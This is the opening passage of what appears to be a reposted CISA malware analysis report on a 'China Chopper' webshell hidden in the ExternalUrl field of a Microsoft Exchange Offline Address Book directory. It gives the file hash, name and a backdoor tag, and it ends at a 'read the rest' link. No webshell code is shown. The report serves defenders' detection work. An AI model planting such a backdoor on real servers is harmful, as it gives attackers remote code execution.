Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Summary
Description
CISA received one file for analysis. The file appears to contain configuration data for a Microsoft Exchange Offline Address Book (OAB) Virtual Directory (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications for the ExternalUrl parameters for the VD on the targeted Exchange Server. The ExternalUrl parameter contains a "China Chopper" webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server.
For a downloadable copy of IOCs, see: MAR-10329298-1.v1.stix.
Submitted Files (1)
bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61 (E3MsTjP8.aspx)
Findings
bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61
Tags
backdoor
Details
Name
E3MsTjP8.aspx
Size
2353 bytes
Type
HTML document, ..
Support the originator by clicking the read the rest link below.
